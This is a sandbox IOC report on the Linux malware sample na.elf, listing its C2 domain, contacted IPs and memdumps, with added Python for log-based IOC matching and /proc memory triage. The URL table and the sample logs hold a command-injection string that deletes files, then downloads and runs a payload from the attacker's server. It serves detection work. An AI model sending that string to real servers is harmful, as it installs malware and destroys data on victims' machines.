IOC Report
na.elf

IOC report for the Linux sample na.elf (executed from /tmp/na.elf). The report's Malicious flag column did not survive extraction for the Processes, URLs, Domains and IPs tables below, nor did the Regiontype column of the Memdumps table; only the memdump Malicious flags are preserved.

Processes

Path                                                Cmdline
/tmp/na.elf                                         /tmp/na.elf
/tmp/na.elf                                         -
/tmp/na.elf                                         -
/tmp/na.elf                                         -
/tmp/na.elf                                         -
/tmp/na.elf                                         -
/tmp/na.elf                                         -
/tmp/na.elf                                         -
/usr/bin/xfce4-panel                                -
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0   /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
/usr/bin/xfce4-panel                                -
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0   /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
/usr/bin/xfce4-panel                                -
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0   /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
/usr/bin/xfce4-panel                                -
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0   /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0   -
/usr/sbin/xfpm-power-backlight-helper               /usr/sbin/xfpm-power-backlight-helper --get-max-brightness
/usr/bin/xfce4-panel                                -
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0   /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
/usr/bin/xfce4-panel                                -
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0   /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
/usr/bin/dbus-daemon                                -
/usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd      /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd
/usr/bin/dbus-daemon                                -
/usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd      /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd
/usr/bin/dash                                       -
/usr/bin/rm                                         rm -f /tmp/tmp.kjfn9YX9xh /tmp/tmp.TUf8qCp3rV /tmp/tmp.P6a6B54VGD
/usr/bin/dash                                       -
/usr/bin/cat                                        cat /tmp/tmp.kjfn9YX9xh
/usr/bin/dash                                       -
/usr/bin/head                                       head -n 10
/usr/bin/dash                                       -
/usr/bin/tr                                         tr -d \\000-\\011\\013\\014\\016-\\037
/usr/bin/dash                                       -
/usr/bin/cut                                        cut -c -80
/usr/bin/dash                                       -
/usr/bin/cat                                        cat /tmp/tmp.kjfn9YX9xh
/usr/bin/dash                                       -
/usr/bin/head                                       head -n 10
/usr/bin/dash                                       -
/usr/bin/tr                                         tr -d \\000-\\011\\013\\014\\016-\\037
/usr/bin/dash                                       -
/usr/bin/cut                                        cut -c -80
/usr/bin/dash                                       -
/usr/bin/rm                                         rm -f /tmp/tmp.kjfn9YX9xh /tmp/tmp.TUf8qCp3rV /tmp/tmp.P6a6B54VGD

(36 further process entries are not shown in this extract.)

URLs

Name                                                                              IP
http://92.249.48.84/bin                                                           unknown
http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+92.249.48.84/jaws;sh+/tmp/jaws   48.142.132.238
http://schemas.xmlsoap.org/soap/encoding/                                         unknown
http://schemas.xmlsoap.org/soap/envelope/                                         unknown

Domains

Name            IP
plutoc2.site    92.249.48.84

IPs

IP               Domain    Country
178.156.193.121  unknown   Romania
58.224.90.217    unknown   Korea, Republic of
197.10.137.32    unknown   Tunisia
117.201.9.234    unknown   India
169.246.74.23    unknown   United States
41.233.156.20    unknown   Egypt
5.99.177.232     unknown   Italy
197.233.228.82   unknown   Namibia
75.84.213.107    unknown   United States
212.29.134.46    unknown   Italy
37.132.200.40    unknown   Spain
197.43.225.174   unknown   Egypt
181.104.232.167  unknown   Argentina
148.79.127.85    unknown   United Kingdom
42.37.213.180    unknown   Korea, Republic of
197.136.25.8     unknown   Kenya
42.16.158.43     unknown   Korea, Republic of
37.187.76.119    unknown   France
118.2.165.63     unknown   Japan
156.23.113.247   unknown   United States
2.250.56.117     unknown   Sweden
156.146.54.81    unknown   United States
38.163.119.173   unknown   United States
196.2.134.197    unknown   South Africa
156.3.86.173     unknown   United States
43.61.49.52      unknown   Japan
4.209.22.131     unknown   United States
41.227.233.227   unknown   Tunisia
100.4.94.87      unknown   United States
148.192.87.27    unknown   United States
41.91.211.160    unknown   Egypt
197.90.74.68     unknown   South Africa
208.4.152.243    unknown   United States
23.87.103.128    unknown   United States
212.211.212.5    unknown   Germany
156.223.50.236   unknown   Egypt
197.212.229.4    unknown   Zambia
5.26.4.155       unknown   Turkey
197.249.181.85   unknown   Mozambique
50.173.113.183   unknown   United States
202.189.71.204   unknown   Australia
41.124.253.219   unknown   South Africa
41.169.198.171   unknown   South Africa
197.4.29.23      unknown   Tunisia
99.119.72.226    unknown   United States
156.44.103.2     unknown   Canada
41.239.218.22    unknown   Egypt
156.67.60.68     unknown   Spain
189.225.224.10   unknown   Mexico
4.0.229.155      unknown   United States
216.204.175.43   unknown   United States
41.27.51.187     unknown   South Africa
37.250.252.6     unknown   Sweden
197.140.232.131  unknown   Algeria
41.6.4.195       unknown   South Africa
91.181.131.228   unknown   Belgium
58.51.252.51     unknown   China
216.28.163.223   unknown   United States
212.44.162.234   unknown   Germany
157.37.77.202    unknown   India
19.209.85.222    unknown   United States
168.196.168.228  unknown   Brazil
161.138.191.11   unknown   Bolivia
149.112.233.190  unknown   Reserved
44.46.250.42     unknown   United States
197.69.35.14     unknown   South Africa
178.10.231.71    unknown   Germany
148.49.234.30    unknown   United States
197.23.201.58    unknown   Tunisia
5.17.173.26      unknown   Russian Federation
54.123.98.147    unknown   United States
41.42.142.171    unknown   Egypt
197.20.132.111   unknown   Tunisia
157.153.30.196   unknown   United States
60.206.158.229   unknown   China
59.122.129.97    unknown   Taiwan, Republic of China
147.229.176.50   unknown   Czech Republic
206.90.119.97    unknown   United States
156.158.50.37    unknown   Tanzania, United Republic of
143.2.251.174    unknown   United States
34.225.173.254   unknown   United States
41.127.73.143    unknown   South Africa
101.30.244.191   unknown   China
9.123.120.231    unknown   United States
13.101.153.40    unknown   United States
25.133.163.145   unknown   United Kingdom
109.96.50.0      unknown   Romania
156.70.138.53    unknown   United States
152.89.87.14     unknown   Netherlands
123.222.254.101  unknown   Japan
196.9.24.75      unknown   South Africa
5.72.153.231     unknown   Iran, Islamic Republic of
123.222.96.192   unknown   Japan
53.210.65.26     unknown   Germany
197.3.15.225     unknown   Tunisia
156.188.232.16   unknown   Egypt
41.217.104.38    unknown   Nigeria
148.30.136.176   unknown   United States
212.192.64.237   unknown   Russian Federation
101.88.117.150   unknown   China

(90 further IPs are not shown in this extract.)
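The URL, Domain and IP tables above are only useful once they are matched against your own telemetry. What follows is an added example, not part of the sandbox report: it loads the indicators from those three tables, decodes the "+"-encoded command string in the report's /shell? URL the way a CGI handler would ("+" is form encoding for a space, so the query reads cd /tmp;rm -rf *;wget 92.249.48.84/jaws;sh /tmp/jaws), and runs the checks over constructed web-server access-log lines and a DNS lookup. Only plutoc2.site, 92.249.48.84 and the two report URLs come from the page; the log lines, the client addresses in them (203.0.113.x, 10.0.0.x), the second /shell? variant fetching from 198.51.100.4 and the shell-verb list used to recognise a command chain are assumptions made for the example. The command-chain check deliberately generalises the report's single URL: any request whose decoded query contains a download or execute verb is split into its ";"-separated stages, and a stage that fetches from an IOC host is reported separately, so a re-pointed copy of the same payload still produces a hit.

```python
# Added example: match the report's network IOCs against constructed log lines.
# Not part of the sandbox report; the IOC values are copied from the tables above,
# every log line and non-report address here is constructed for illustration.
import re
from urllib.parse import unquote_plus, urlsplit

# Indicators copied from the report's URL, Domain and IP tables.
IOC_DOMAINS = {"plutoc2.site"}
IOC_IPS = {"92.249.48.84"}  # address the report resolved plutoc2.site to
IOC_URLS = {
    "http://92.249.48.84/bin",
    "http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+92.249.48.84/jaws;sh+/tmp/jaws",
}

# Assumed verb list: a decoded query containing one of these is treated as a command
# chain rather than data. Word boundaries keep "sh" from matching inside "shell".
CMD_VERBS = re.compile(r"(?<![\w/])(wget|curl|tftp|sh|busybox|chmod|rm|cd)(?![\w-])")


def command_chain(url):
    """Return the shell stages carried in url's query, decoded the way a CGI handler
    would see them ('+' -> space, %XX -> byte), or [] when the query is not a chain.
    For the report's /shell? URL this is ['cd /tmp', 'rm -rf *', ...]."""
    query = urlsplit(url).query
    if not query:
        return []
    decoded = unquote_plus(query)
    if not CMD_VERBS.search(decoded):
        return []
    return [stage.strip() for stage in decoded.split(";") if stage.strip()]


def ioc_hits(url):
    """Sorted list of reasons a URL matches the report: exact URL, host in the domain
    or IP table, a command chain in the query, or a chain stage fetching from an IOC host."""
    hits = set()
    host = urlsplit(url).hostname or ""
    if host in IOC_DOMAINS:
        hits.add("domain:" + host)
    if host in IOC_IPS:
        hits.add("ip:" + host)
    if url in IOC_URLS:
        hits.add("url:exact")
    chain = command_chain(url)
    if chain:
        hits.add("query:command-chain")
        for stage in chain:
            for token in stage.split():
                # "wget 92.249.48.84/jaws" -> host part before the first slash
                stage_host = token.split("/")[0]
                if stage_host in IOC_IPS or stage_host in IOC_DOMAINS:
                    hits.add("stage-host:" + stage_host)
    return sorted(hits)


def dns_hits(qname, answers=()):
    """Flag a DNS lookup by queried name or by any answer address from the report."""
    name = qname.rstrip(".").lower()
    hits = ["domain:" + name] if name in IOC_DOMAINS else []
    return hits + ["ip:" + a for a in answers if a in IOC_IPS]


# Combined-format access log: client ident user [time] "METHOD target HTTP/x.y" status bytes
ACCESS_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r"(?P<status>\d{3})"
)


def scan_access_log(lines, server="127.0.0.1:80"):
    """Return (client, target, hits) for every request whose target trips a rule.
    Relative targets are joined to 'server' so the same URL helpers apply."""
    findings = []
    for line in lines:
        m = ACCESS_RE.match(line)
        if not m:
            continue  # not a request line; skip rather than crash on junk
        target = m.group("target")
        url = target if target.startswith("http") else "http://" + server + target
        hits = ioc_hits(url)
        if hits:
            findings.append((m.group("client"), target, hits))
    return findings


# Constructed sample log lines (not from the report). The last one carries a
# semicolon and the word "shell" in a harmless search query and must not fire.
SAMPLE_ACCESS_LOG = [
    '10.0.0.7 - - [01/Jan/2024:00:00:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2024:00:00:02 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+92.249.48.84/jaws;sh+/tmp/jaws HTTP/1.1" 404 0',
    '203.0.113.9 - - [01/Jan/2024:00:00:03 +0000] "GET /shell?cd+/tmp;wget+http://198.51.100.4/x;sh+/tmp/x HTTP/1.1" 404 0',
    '10.0.0.8 - - [01/Jan/2024:00:00:04 +0000] "GET /search?q=shell+scripts;v=2 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for client, target, hits in scan_access_log(SAMPLE_ACCESS_LOG):
        print(client, target, hits)
    print(dns_hits("plutoc2.site.", ["92.249.48.84"]))
```

Matching on the decoded query rather than the raw URL is the point: the same payload arrives with different encodings ("+", "%20", or literal spaces on permissive servers) and with different staging hosts, and a rule keyed to the exact string in the URL table would miss all of those. Treat the verb list as a starting point and tune it against your own traffic before alerting on it.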

Memdumps

Base Address    Protect                          Malicious
7f88a4026000    page execute read                malicious
7f88a4026000    page execute read                malicious
7f89ac9ad000    page read and write              -
7f89acb23000    page read and write              -
7f89ac27b000    page read and write              -
55d1b2c36000    page read and write              -
7f89ab7db000    page read and write              -
55d1b29ff000    page execute read                -
55d1b4c34000    page execute and read and write  -
7f88a4038000    page read and write              -
55d1b2c2d000    page read and write              -
7f89acade000    page read and write              -
7f89abfde000    page read and write              -
55d1b29ff000    page execute read                -
7f89a4021000    page read and write              -
7f89a4000000    page read and write              -
55d1b4c34000    page execute and read and write  -
55d1b2c36000    page read and write              -
7f89acad6000    page read and write              -
7f88a4036000    page read and write              -
7f89acade000    page read and write              -
7f89ab7db000    page read and write              -
7f88a4038000    page read and write              -
7fff5d91f000    page read and write              -
7f89a4021000    page read and write              -
55d1b5ff7000    page read and write              -
7f88a4036000    page read and write              -
7fff5d91f000    page read and write              -
7f89acb23000    page read and write              -
7f89abfec000    page read and write              -
55d1b5ff7000    page read and write              -
7f89ac63d000    page read and write              -
7f89ac27b000    page read and write              -
55d1b2c2d000    page read and write              -
7f89ac63d000    page read and write              -
7f89ac9ad000    page read and write              -
55d1b4c4b000    page read and write              -
7f89a4000000    page read and write              -
55d1b4c4b000    page read and write              -
7f89ac662000    page read and write              -
7f89ac662000    page read and write              -
7fff5d945000    page execute read                -
7f89abfde000    page read and write              -
7f89acad6000    page read and write              -
7fff5d945000    page execute read                -
7f89abfec000    page read and write              -

(36 further memdumps are not shown in this extract.)
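The memdump table flags two page-execute-read dumps at 7f88a4026000 as malicious but, in this extract, says nothing about what backs that region. On a live host the equivalent triage question is which executable mappings a process has that no loaded file accounts for. The following is an added example, not part of the report: it parses /proc/<pid>/maps, flags executable regions that are also writable, anonymous, or backed by an unlinked file or memfd, and looks up which mapping a given address falls into. The maps text is constructed for the example; its start addresses echo the report's table so the lookup is meaningful, but the region sizes, paths, devices and inodes are made up, and treating "executable with no backing file" as the dump criterion is the example's assumption, not something the report states.

```python
# Added example: find executable memory regions of a running process that a normally
# loaded ELF would not have. Not part of the sandbox report; the /proc/<pid>/maps text
# below is constructed (the start addresses echo the report's memdump table; the paths,
# sizes, devices and inodes are made up) so the parser runs offline.
import re
from dataclasses import dataclass

# One /proc/<pid>/maps line: start-end perms offset dev inode [path]
MAPS_RE = re.compile(
    r"^(?P<start>[0-9a-f]+)-(?P<end>[0-9a-f]+) (?P<perms>[rwxsp-]{4}) "
    r"(?P<offset>[0-9a-f]+) (?P<dev>[0-9a-f]+:[0-9a-f]+) (?P<inode>\d+)\s*(?P<path>.*)$"
)

# Kernel-provided mappings that are executable without a backing file by design.
KERNEL_EXEC = {"[vdso]", "[vsyscall]"}


@dataclass
class Region:
    start: int
    end: int
    perms: str  # e.g. "r-xp"
    path: str   # "" for anonymous memory, "[heap]"/"[stack]" for kernel-named regions

    @property
    def executable(self):
        return "x" in self.perms

    @property
    def writable(self):
        return "w" in self.perms

    @property
    def file_backed(self):
        """True only for a mapping of a still-linked file on disk."""
        return (self.path.startswith("/") and "(deleted)" not in self.path
                and not self.path.startswith("/memfd:"))


def parse_maps(text):
    """Parse the text of /proc/<pid>/maps into Region objects, skipping malformed lines."""
    regions = []
    for line in text.splitlines():
        m = MAPS_RE.match(line)
        if m:
            regions.append(Region(int(m["start"], 16), int(m["end"], 16),
                                  m["perms"], m["path"].strip()))
    return regions


def suspicious_regions(regions):
    """Return (region, reason) pairs for executable regions worth dumping:
    'rwx'            writable and executable at once (JIT-style or unpacked code)
    'anonymous-exec' executable but backed by no file and not a kernel mapping
    'unlinked-exec'  executable, backed by a deleted file or a memfd"""
    found = []
    for r in regions:
        if not r.executable:
            continue
        if r.writable:
            found.append((r, "rwx"))
        elif r.path in KERNEL_EXEC:
            continue
        elif r.path == "" or r.path.startswith("["):
            found.append((r, "anonymous-exec"))
        elif not r.file_backed:
            found.append((r, "unlinked-exec"))
    return found


def region_at(regions, addr):
    """Region containing addr (e.g. a base address from the memdump table), or None."""
    for r in regions:
        if r.start <= addr < r.end:
            return r
    return None


def read_region(pid, region):
    """Dump a region's bytes from /proc/<pid>/mem. Needs ptrace rights over pid
    (same user with Yama ptrace_scope permitting it, or CAP_SYS_PTRACE)."""
    with open(f"/proc/{pid}/mem", "rb", buffering=0) as mem:
        mem.seek(region.start)
        return mem.read(region.end - region.start)


# Constructed maps text (not from the report); only the start addresses echo the table.
SAMPLE_MAPS = """\
55d1b29ff000-55d1b2a80000 r-xp 00000000 08:01 1234                       /tmp/na.elf
55d1b2c2d000-55d1b2c36000 rw-p 0022e000 08:01 1234                       /tmp/na.elf
55d1b4c34000-55d1b4c4b000 rwxp 00000000 00:00 0                          [heap]
7f88a4000000-7f88a4026000 rw-p 00000000 00:00 0
7f88a4026000-7f88a4036000 r-xp 00000000 00:00 0
7f89ac63d000-7f89ac662000 r-xp 00000000 08:01 5678                       /usr/lib/x86_64-linux-gnu/libc.so.6
7fff5d91f000-7fff5d940000 rw-p 00000000 00:00 0                          [stack]
7fff5d945000-7fff5d947000 r-xp 00000000 00:00 0                          [vdso]
"""

if __name__ == "__main__":
    regions = parse_maps(SAMPLE_MAPS)
    for r, why in suspicious_regions(regions):
        print(f"{r.start:x}-{r.end:x} {r.perms} {why} {r.path}")
```

On a real process, feed parse_maps the contents of /proc/<pid>/maps and pass the flagged regions to read_region; the dump is what you would hand to a disassembler or YARA, and the start address is what you would compare with a sandbox's memdump base addresses such as the ones above.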